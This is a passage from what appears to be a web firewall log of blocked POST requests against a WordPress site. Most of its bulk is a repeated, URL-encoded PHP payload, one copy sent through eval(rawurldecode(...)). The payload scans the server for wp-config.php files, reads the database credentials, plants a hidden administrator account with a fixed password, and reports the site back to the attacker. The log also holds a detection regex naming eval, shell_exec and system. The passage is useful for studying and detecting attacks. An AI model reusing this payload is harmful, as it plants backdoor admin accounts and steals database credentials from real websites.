A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/wp-includes\/Text\/hvsmdki\/1qjzitp\/hbmzirl\/function.debug.php HTTP\/1.1\nsec-ch-ua-platform:\"Windows\"\nsec-fetch-site:none\nsec-fetch-mode:navigate\nsec-fetch-user:?1\nsec-fetch-dest:document\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/116.0.0.0 Safari\/537.36\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\ncookie:4=1e9e32e066be8d516ba04b54073ce441; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvoJDvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzAuL2uyVwgcMvuznJkyK3O1qS9wo250MJ50pltxpPjxLlxcr2yhL2k1MTHtWUN7DUIhoTyhnltxpPx7MKucqQg9sK1xnJHbVvSho3E3paEvoPRvXGf=; 1=53; 0=71\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\nsec-ch-ua:\"Chromium\";v=\"116\", \"Not)A;Brand\";v=\"24\", \"Google Chrome\";v=\"116\"\ncontent-type:application\/x-www-form-urlencoded\nsec-ch-ua-mobile:?0\ncontent-length:12640\n\nmd=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 06:05:37","213.209.159.254","POST","\/wp-includes\/compat-utf8.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/119.0.0.0 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> fpVGge:eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));","POST \/wp-includes\/compat-utf8.php HTTP\/1.1\nsec-ch-ua-platform:\"macOS\"\ncontent-type:application\/x-www-form-urlencoded\ncontent-length:12663\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nsec-fetch-site:none\naccept-encoding:gzip,deflate\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\nsec-fetch-user:?1\naccept:*\/*\nsec-fetch-dest:document\nupgrade-insecure-requests:1\nsec-ch-ua:\"Google Chrome\";v=\"119\", \"Chromium\";v=\"119\", \"Not?A_Brand\";v=\"24\"\nsec-fetch-mode:navigate\nsec-ch-ua-mobile:?0\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/119.0.0.0 Safari\/537.36\n\nfpVGge=eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%